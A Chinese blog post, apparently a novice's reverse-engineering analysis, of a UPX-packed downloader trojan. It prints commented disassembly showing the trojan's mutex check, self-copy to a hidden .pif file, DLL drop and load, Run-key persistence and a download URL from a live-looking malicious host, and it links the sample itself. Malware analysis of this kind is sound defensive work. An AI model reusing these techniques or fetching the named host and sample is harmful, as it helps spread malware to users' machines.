简单的下载者木马分析

算是第一次自己分析一个完整的木马，时间花费很长释放的dll还没来及分析后面会跟上。好多api都是刚刚查过才知道。很简单大家不要吐槽啊。附件里面有idb和原文件还有脱壳后的文件。欢迎大家批评指教

附件：http://bbs.pediy.com/showthread.php?p=1090998#post1090998

基本信息

报告名称：ye.exe下载者木马分析
作者：
报告更新日期：2012.7.29

文件名称：9648c7cc2f01d7b67718cb89a48d927e

文件哈希：9648c7cc2f01d7b67718cb89a48d927e

文件大小：31528字节

创建时间：2012-04-13 02:01:37

文件类型：EXE

PEID信息：UPX 2.93 (LZMA) [Overlay] *
可能受到威胁的系统：
windows

详细分析／功能介绍

1.upx解压缩执行原程序

2.提升进程权限，创建互斥体

3保存自身到文件

4释放dll加载dll，修改注册表使dll自启动

5下载文件 "http://c.shidaihuabian.com/s.gif" >> "%windir%\temp\olm.ini"

提升进程权限，创建互斥体，跳转到主体部分

部分反汇编代码

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CODE:00401820                 push    ebp
CODE:00401821                 mov     ebp, esp
CODE:00401823                 sub     esp, 174h
CODE:00401829                 push    ebx
CODE:0040182A                 push    esi
CODE:0040182B                 push    1
CODE:0040182D                 call    _Rtladjustprivilege ; 提升整个进程的权限至14h
CODE:00401832                 push    104h
CODE:00401837                 push    offset modulepath
CODE:0040183C                 push    0
CODE:0040183E                 call    _getmodulefilename ; 返回当前程序的路径
CODE:00401843                 add     esp, 10h
CODE:00401846                 mov     al, 's'
CODE:00401848                 mov     [ebp+var_10], al
CODE:0040184B                 mov     [ebp+var_42], al
CODE:0040184E                 push    offset Name     ; "KAIFAONGQUMEIGANDE"
CODE:00401853                 mov     bl, 'e'
CODE:00401855                 mov     al, 'E'
CODE:00401857                 push    0               ; bInitialOwner
CODE:00401859                 push    0               ; lpMutexAttributes
CODE:0040185B                 mov     [ebp+var_8], 'o'
CODE:0040185F                 mov     [ebp+var_7], 'p'
CODE:00401863                 mov     [ebp+var_6], bl ; e
CODE:00401866                 mov     [ebp+var_5], 'n'
CODE:0040186A                 mov     [ebp+var_4], 0
CODE:0040186E                 mov     [ebp+var_F], 'c'
CODE:00401872                 mov     [ebp+var_E], '.'
CODE:00401876                 mov     [ebp+var_D], bl ; e
CODE:00401879                 mov     [ebp+var_C], 'x'
CODE:0040187D                 mov     [ebp+var_B], bl ; e
CODE:00401880                 mov     [ebp+var_A], 0
CODE:00401884                 mov     [ebp+var_44], 't'
CODE:00401888                 mov     [ebp+var_43], 'a'
CODE:0040188C                 mov     [ebp+var_41], 'k'
CODE:00401890                 mov     [ebp+var_40], 'k'
CODE:00401894                 mov     [ebp+var_3F], 'i'
CODE:00401898                 mov     [ebp+var_3E], 'l'
CODE:0040189C                 mov     [ebp+var_3D], 'l'
CODE:004018A0                 mov     [ebp+var_3C], '.'
CODE:004018A4                 mov     [ebp+var_3B], bl ; e
CODE:004018A7                 mov     [ebp+var_3A], 78h
CODE:004018AB                 mov     [ebp+var_39], bl ; e
CODE:004018AE                 mov     [ebp+var_38], 0
CODE:004018B2                 mov     [ebp+var_28], bl ; e
CODE:004018B5                 mov     [ebp+var_27], 'k'
CODE:004018B9                 mov     [ebp+var_26], 'r'
CODE:004018BD                 mov     [ebp+var_25], 'n'
CODE:004018C1                 mov     [ebp+var_24], '.'
CODE:004018C5                 mov     [ebp+var_23], al ; E
CODE:004018C8                 mov     [ebp+var_22], 'X'
CODE:004018CC                 mov     [ebp+var_21], al ; E
CODE:004018CF                 mov     [ebp+var_20], 0
CODE:004018D3                 call    CreateMutexA    ; 创建互斥体
CODE:004018D9                 mov     esi, eax
CODE:004018DB                 nop
CODE:004018DC                 nop
CODE:004018DD                 nop
CODE:004018DE                 nop
CODE:004018DF                 nop
CODE:004018E0                 call    GetLastError
CODE:004018E6                 cmp     eax, 0B7h
CODE:004018EB                 jnz     short @mainpart ; 如果互斥体不存在那么说明没有同样的进程正在运行跳转运行程序
CODE:004018ED                 push    esi
CODE:004018EE                 call    _closehandle
CODE:004018F3                 add     esp, 4
CODE:004018F6                 nop
CODE:004018F7                 nop
CODE:004018F8                 nop
CODE:004018F9                 nop
CODE:004018FA                 push    0               ; uType
CODE:004018FC                 push    offset Caption ; "0"
CODE:00401901                 push    offset Caption ; "0"
CODE:00401906                 push    0FFFFFFFFh      ; hWnd
CODE:00401908                 call    MessageBoxA
CODE:0040190E                 push    0               ; uExitCode
CODE:00401910                 call    ExitProcess
CODE:00401916 ; ---------------------------------------------------------------------------

劫持ekrn.exe 释放c:/programfile/common file//rgdltecq//nhoifz.pif跳转到释放dll的部分

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CODE:004019BB                 call    sub_4028D0      ; 获取ekrn.exe ID
CODE:004019C0                 add     esp, 4
CODE:004019C3                 cmp     eax, 1
CODE:004019C6                 jbe     short loc_401A2A ; 如果没有开启ekrn.exe跳转开启先进行处理
CODE:004019C8                 push    0
CODE:004019CA                 lea     ecx, [ebp+var_50]
CODE:004019CD                 push    0
CODE:004019CF                 lea     edx, [ebp+var_10]
CODE:004019D2                 push    ecx
CODE:004019D3                 lea     eax, [ebp+var_8]
CODE:004019D6                 push    edx
CODE:004019D7                 push    eax
CODE:004019D8                 push    0
CODE:004019DA                 call    sub_4027A0
CODE:004019DF                 push    1F4h
CODE:004019E4                 call    _Sleep
CODE:004019E9                 push    0
CODE:004019EB                 lea     ecx, [ebp+var_60]
CODE:004019EE                 push    0
CODE:004019F0                 lea     edx, [ebp+var_44]
CODE:004019F3                 push    ecx
CODE:004019F4                 lea     eax, [ebp+var_8]
CODE:004019F7                 push    edx
CODE:004019F8                 push    eax
CODE:004019F9                 push    0
CODE:004019FB                 call    sub_4027A0
CODE:00401A00                 push    1F4h
CODE:00401A05                 call    _Sleep
CODE:00401A0A                 nop
CODE:00401A0B                 nop
CODE:00401A0C                 nop
CODE:00401A0D                 nop
CODE:00401A0E                 nop
CODE:00401A0F                 nop
CODE:00401A10                 push    0
CODE:00401A12                 lea     ecx, [ebp+var_70]
CODE:00401A15                 push    0
CODE:00401A17                 lea     edx, [ebp+var_44]
CODE:00401A1A                 push    ecx
CODE:00401A1B                 lea     eax, [ebp+var_8]
CODE:00401A1E                 push    edx
CODE:00401A1F                 push    eax
CODE:00401A20                 push    0
CODE:00401A22                 call    sub_4027A0
CODE:00401A27                 add     esp, 50h
CODE:00401A2A
CODE:00401A2A loc_401A2A:                             ; CODE XREF: start+1A6j
CODE:00401A2A                 push    edi
CODE:00401A2B                 mov     ecx, 40h
CODE:00401A30                 xor     eax, eax
CODE:00401A32                 lea     edi, [ebp+var_173]
CODE:00401A38                 mov     [ebp+floderpath], 0
CODE:00401A3F                 push    1               ; 如果不存在创建
CODE:00401A41                 rep stosd
CODE:00401A43                 stosw
CODE:00401A45                 lea     ecx, [ebp+floderpath]
CODE:00401A4B                 push    2Bh             ; c:/programfile/common file
CODE:00401A4D                 push    ecx
CODE:00401A4E                 push    0
CODE:00401A50                 stosb                   ; 43字节全为0
CODE:00401A51                 call    _SHGetSpecialFloderPath ; 获取上面的路径如果文件不存在创建新的
CODE:00401A56                 mov     esi, lstrcat
CODE:00401A5C                 add     esp, 10h
CODE:00401A5F                 lea     edx, [ebp+floderpath]
CODE:00401A65                 mov     [ebp+Caption], 'r'
CODE:00401A69                 push    offset asc_41D8C8 ; "\\"
CODE:00401A6E                 push    edx
CODE:00401A6F                 mov     [ebp+var_1B], 'g'
CODE:00401A73                 mov     [ebp+var_1A], 'd'
CODE:00401A77                 mov     [ebp+var_19], 'l'
CODE:00401A7B                 mov     [ebp+var_18], 't'
CODE:00401A7F                 mov     [ebp+var_17], bl ; e
CODE:00401A82                 mov     [ebp+var_16], 'c'
CODE:00401A86                 mov     [ebp+var_15], 'q'
CODE:00401A8A                 mov     [ebp+var_14], 0
CODE:00401A8E                 call    esi ; lstrcat
CODE:00401A90                 lea     eax, [ebp+Caption]
CODE:00401A93                 lea     ecx, [ebp+floderpath]
CODE:00401A99                 push    eax
CODE:00401A9A                 push    ecx
CODE:00401A9B                 call    esi ; lstrcat
CODE:00401A9D                 lea     edx, [ebp+Caption]
CODE:00401AA0                 push    0               ; uType
CODE:00401AA2                 lea     eax, [ebp+floderpath]
CODE:00401AA8                 push    edx             ; lpCaption rgdltecq
CODE:00401AA9                 push    eax             ; lpText c:/programfile/common file//rgdltecq
CODE:00401AAA                 push    0FFFFFFFFh      ; hWnd
CODE:00401AAC                 call    MessageBoxA
CODE:00401AB2                 lea     ecx, [ebp+floderpath]
CODE:00401AB8                 push    0
CODE:00401ABA                 push    ecx
CODE:00401ABB                 call    _CreateDirectory ; 创建文件夹 c:/programfile/common file//rgdltecq
CODE:00401AC0                 add     esp, 8
CODE:00401AC3                 lea     edx, [ebp+floderpath]
CODE:00401AC9                 mov     [ebp+var_34], 'n'
CODE:00401ACD                 mov     [ebp+var_33], 'h'
CODE:00401AD1                 push    offset asc_41D8C8 ; "\\"
CODE:00401AD6                 push    edx
CODE:00401AD7                 mov     [ebp+var_32], 'o'
CODE:00401ADB                 mov     [ebp+var_31], 'i'
CODE:00401ADF                 mov     [ebp+var_30], 'f'
CODE:00401AE3                 mov     [ebp+var_2F], 'z'
CODE:00401AE7                 mov     [ebp+var_2E], '.'
CODE:00401AEB                 mov     [ebp+var_2D], 'p'
CODE:00401AEF                 mov     [ebp+var_2C], 'i'
CODE:00401AF3                 mov     [ebp+var_2B], 'f'
CODE:00401AF7                 mov     [ebp+var_2A], 0
CODE:00401AFB                 call    esi ; lstrcat
CODE:00401AFD                 lea     eax, [ebp+var_34]
CODE:00401B00                 lea     ecx, [ebp+floderpath]
CODE:00401B06                 push    eax
CODE:00401B07                 push    ecx
CODE:00401B08                 call    esi ; lstrcat
CODE:00401B0A                 lea     edx, [ebp+floderpath] ; c:/programfile/common file//rgdltecq//nhoifz.pif
CODE:00401B10                 push    0
CODE:00401B12                 push    edx
CODE:00401B13                 push    offset modulepath
CODE:00401B18                 call    _copyfilename   ; 把当前文件复制到上面的路径
CODE:00401B1D                 push    0FA0h
CODE:00401B22                 call    _Sleep
CODE:00401B27                 add     esp, 10h
CODE:00401B2A                 call    loc_4015B0
CODE:00401B2F                 pop     edi
CODE:00401B30                 pop     esi
CODE:00401B31                 mov     eax, 1
CODE:00401B36                 pop     ebx
CODE:00401B37                 mov     esp, ebp
CODE:00401B39                 pop     ebp
CODE:00401B3A                 retn
CODE:00401B3A start           endp
CODE:00401B3A
CODE:00401B3A ; ---------------------------------------------------------------------------

释放dll，加载dll修改注册表开机自动加载dll。分析这一部分花费了好长时间的 dll部分等下次吧

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CODE:004015B0 loc_4015B0:                             ; CODE XREF: start+30Ap
CODE:004015B0                 push    ebp
CODE:004015B1                 mov     ebp, esp
CODE:004015B3                 sub     esp, 1E0h
CODE:004015B9                 push    ebx
CODE:004015BA                 push    esi
CODE:004015BB                 push    edi
CODE:004015BC                 nop
CODE:004015BD                 nop
CODE:004015BE                 nop
CODE:004015BF                 nop
CODE:004015C0                 jb      short loc_4015C5
CODE:004015C2                 jnb     short loc_4015C5
CODE:004015C2 ; ---------------------------------------------------------------------------
CODE:004015C4                 db 0E8h ; ?
CODE:004015C5 ; ---------------------------------------------------------------------------
CODE:004015C5
CODE:004015C5 loc_4015C5:                             ; CODE XREF: CODE:004015C0j
CODE:004015C5                                         ; CODE:004015C2j
CODE:004015C5                 mov     ecx, 40h
CODE:004015CA                 xor     eax, eax
CODE:004015CC                 lea     edi, [ebp-14Bh]
CODE:004015D2                 mov     byte ptr [ebp-14Ch], 0
CODE:004015D9                 rep stosd
CODE:004015DB                 stosw
CODE:004015DD                 stosb                   ; 从-14Bh开始43h个字节置0
CODE:004015DE                 lea     eax, [ebp-14Ch]
CODE:004015E4                 push    104h
CODE:004015E9                 push    eax
CODE:004015EA                 call    _getsystemdirectory ; 获取系统目录
CODE:004015EF                 xor     ecx, ecx
CODE:004015F1                 add     esp, 8
CODE:004015F4                 mov     [ebp-47h], ecx
CODE:004015F7                 mov     byte ptr [ebp-48h], 0
CODE:004015FB                 mov     [ebp-43h], cx
CODE:004015FF                 mov     [ebp-41h], cl
CODE:00401602                 call    GetTickCount
CODE:00401608                 push    eax
CODE:00401609                 lea     edx, [ebp-48h]
CODE:0040160C                 push    offset aD_dll   ; "\\%d.DLL"
CODE:00401611                 push    edx
CODE:00401612                 call    wsprintfA       ; systemruntime.dll
CODE:00401618                 lea     edi, [ebp-48h]
CODE:0040161B                 or      ecx, 0FFFFFFFFh
CODE:0040161E                 xor     eax, eax
CODE:00401620                 add     esp, 0Ch
CODE:00401623                 repne scasb
CODE:00401625                 not     ecx
CODE:00401627                 sub     edi, ecx
CODE:00401629                 lea     edx, [ebp-14Ch]
CODE:0040162F                 mov     esi, edi
CODE:00401631                 mov     ebx, ecx
CODE:00401633                 mov     edi, edx
CODE:00401635                 or      ecx, 0FFFFFFFFh
CODE:00401638                 repne scasb
CODE:0040163A                 mov     ecx, ebx
CODE:0040163C                 dec     edi
CODE:0040163D                 shr     ecx, 2
CODE:00401640                 rep movsd
CODE:00401642                 push    eax
CODE:00401643                 mov     ecx, ebx
CODE:00401645                 lea     eax, [ebp-14Ch] ; %system%systemruntime.dll
CODE:0040164B                 and     ecx, 3
CODE:0040164E                 push    eax
CODE:0040164F                 push    offset a1       ; "1"
CODE:00401654                 rep movsb
CODE:00401656                 push    0FFFFFFFFh
CODE:00401658                 call    MessageBoxA
CODE:0040165E                 lea     ecx, [ebp-14Ch]
CODE:00401664                 push    ecx
CODE:00401665                 call    @releaseDLL
CODE:0040166A                 add     esp, 4
CODE:0040166D                 test    al, al
CODE:0040166F                 jz      loc_401803      ; dll释放失败跳转结束
CODE:00401675                 push    1388h
CODE:0040167A                 call    _Sleep
CODE:0040167F                 add     esp, 4
CODE:00401682                 lea     edx, [ebp-14Ch]
CODE:00401688                 push    edx
CODE:00401689                 call    LoadLibraryA    ; 加载刚写的dll
CODE:0040168F                 mov     esi, eax
CODE:00401691                 test    esi, esi
CODE:00401693                 jz      loc_401803
CODE:00401699                 mov     edi, GetProcAddress
CODE:0040169F                 lea     eax, [ebp-8]
CODE:004016A2                 mov     bl, 'r'
CODE:004016A4                 push    eax
CODE:004016A5                 push    esi
CODE:004016A6                 mov     byte ptr [ebp-8], 'W'
CODE:004016AA                 mov     byte ptr [ebp-7], 'h'
CODE:004016AE                 mov     byte ptr [ebp-6], 'a'
CODE:004016B2                 mov     byte ptr [ebp-5], 'i'
CODE:004016B6                 mov     byte ptr [ebp-4], 'e'
CODE:004016BA                 mov     [ebp-3], bl
CODE:004016BD                 mov     byte ptr [ebp-2], 0
CODE:004016C1                 call    edi ; GetProcAddress ; whaier
CODE:004016C3                 push    0
CODE:004016C5                 call    eax             ; 加载被释放的dll的whaier函数
CODE:004016C7                 push    1388h
CODE:004016CC                 call    _Sleep
CODE:004016D1                 add     esp, 8
CODE:004016D4                 lea     ecx, [ebp-10h]
CODE:004016D7                 mov     byte ptr [ebp-10h], 'S'
CODE:004016DB                 mov     byte ptr [ebp-0Fh], 'i'
CODE:004016DF                 push    ecx
CODE:004016E0                 push    esi
CODE:004016E1                 mov     byte ptr [ebp-0Eh], 'm'
CODE:004016E5                 mov     byte ptr [ebp-0Dh], 'e'
CODE:004016E9                 mov     byte ptr [ebp-0Ch], 'n'
CODE:004016ED                 mov     byte ptr [ebp-0Bh], 'z'
CODE:004016F1                 mov     byte ptr [ebp-0Ah], 'e'
CODE:004016F5                 mov     byte ptr [ebp-9], 0
CODE:004016F9                 call    edi ; GetProcAddress ; simenze
CODE:004016FB                 push    0
CODE:004016FD                 call    eax
CODE:004016FF                 add     esp, 4
CODE:00401702                 lea     edx, [ebp-1E0h]
CODE:00401708                 mov     dword ptr [ebp-1E0h], 94h
CODE:00401712                 push    edx
CODE:00401713                 call    GetVersionExA
CODE:00401719                 cmp     dword ptr [ebp-1DCh], 6
CODE:00401720                 jnb     short loc_401736 ; windows版本在98以上
CODE:00401722                 lea     eax, [ebp-14Ch]
CODE:00401728                 push    eax
CODE:00401729                 call    @change_reg2
CODE:0040172E                 add     esp, 4
CODE:00401731                 jmp     loc_401803
CODE:00401736 ; ---------------------------------------------------------------------------
CODE:00401736
CODE:00401736 loc_401736:                             ; CODE XREF: CODE:00401720j
CODE:00401736                 call    @change_reg     ; 更改注册表提升权限是病毒更安全
CODE:0040173B                 mov     cl, '\'
CODE:0040173D                 push    offset modulepath
CODE:00401742                 mov     [ebp-38h], cl
CODE:00401745                 mov     [ebp-2Eh], cl
CODE:00401748                 mov     [ebp-26h], cl
CODE:0040174B                 mov     [ebp-17h], cl
CODE:0040174E                 lea     ecx, [ebp-40h]
CODE:00401751                 push    offset a360se   ; "360se"
CODE:00401756                 mov     al, 'o'
CODE:00401758                 mov     dl, 's'
CODE:0040175A                 push    ecx
CODE:0040175B                 push    80000002h
CODE:00401760                 mov     byte ptr [ebp-40h], 'S'
CODE:00401764                 mov     [ebp-3Fh], al   ; o
CODE:00401767                 mov     byte ptr [ebp-3Eh], 'f'
CODE:0040176B                 mov     byte ptr [ebp-3Dh], 't'
CODE:0040176F                 mov     byte ptr [ebp-3Ch], 'w'
CODE:00401773                 mov     byte ptr [ebp-3Bh], 'a'
CODE:00401777                 mov     [ebp-3Ah], bl   ; r
CODE:0040177A                 mov     byte ptr [ebp-39h], 'e'
CODE:0040177E                 mov     byte ptr [ebp-37h], 'M'
CODE:00401782                 mov     byte ptr [ebp-36h], 'i'
CODE:00401786                 mov     byte ptr [ebp-35h], 'c'
CODE:0040178A                 mov     [ebp-34h], bl   ; r
CODE:0040178D                 mov     [ebp-33h], al   ; o
CODE:00401790                 mov     [ebp-32h], dl   ; s
CODE:00401793                 mov     [ebp-31h], al   ; o
CODE:00401796                 mov     byte ptr [ebp-30h], 'f'
CODE:0040179A                 mov     byte ptr [ebp-2Fh], 't'
CODE:0040179E                 mov     byte ptr [ebp-2Dh], 'W'
CODE:004017A2                 mov     byte ptr [ebp-2Ch], 'i'
CODE:004017A6                 mov     byte ptr [ebp-2Bh], 'n'
CODE:004017AA                 mov     byte ptr [ebp-2Ah], 'd'
CODE:004017AE                 mov     [ebp-29h], al   ; o
CODE:004017B1                 mov     byte ptr [ebp-28h], 'w'
CODE:004017B5                 mov     [ebp-27h], dl   ; s
CODE:004017B8                 mov     byte ptr [ebp-25h], 'C'
CODE:004017BC                 mov     byte ptr [ebp-24h], 'u'
CODE:004017C0                 mov     [ebp-23h], bl   ; r
CODE:004017C3                 mov     [ebp-22h], bl   ; r
CODE:004017C6                 mov     byte ptr [ebp-21h], 'e'
CODE:004017CA                 mov     byte ptr [ebp-20h], 'n'
CODE:004017CE                 mov     byte ptr [ebp-1Fh], 't'
CODE:004017D2                 mov     byte ptr [ebp-1Eh], 'V'
CODE:004017D6                 mov     byte ptr [ebp-1Dh], 'e'
CODE:004017DA                 mov     [ebp-1Ch], bl
CODE:004017DD                 mov     [ebp-1Bh], dl
CODE:004017E0                 mov     byte ptr [ebp-1Ah], 'i'
CODE:004017E4                 mov     [ebp-19h], al
CODE:004017E7                 mov     byte ptr [ebp-18h], 'n'
CODE:004017EB                 mov     byte ptr [ebp-16h], 'R'
CODE:004017EF                 mov     byte ptr [ebp-15h], 'u'
CODE:004017F3                 mov     byte ptr [ebp-14h], 'n'
CODE:004017F7                 mov     byte ptr [ebp-13h], 0
CODE:004017FB                 call    loc_4014B0
CODE:00401800                 add     esp, 10h
CODE:00401803
CODE:00401803 loc_401803:                             ; CODE XREF: CODE:0040166Fj
CODE:00401803                                         ; CODE:00401693j ...
CODE:00401803                 push    2710h
CODE:00401808                 call    Sleep
CODE:0040180E                 pop     edi
CODE:0040180F                 pop     esi
CODE:00401810                 mov     eax, 1
CODE:00401815                 pop     ebx
CODE:00401816                 mov     esp, ebp
CODE:00401818                 pop     ebp
CODE:00401819                 retn
CODE:00401819 ; ---------------------------------------------------------------------------
CODE:0040181A                 align 10h
CODE:00401820

posted @ 2012-07-29 12:06 麦小扣_刘阅读(601) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

麦小扣_刘

简单的下载者木马分析

公告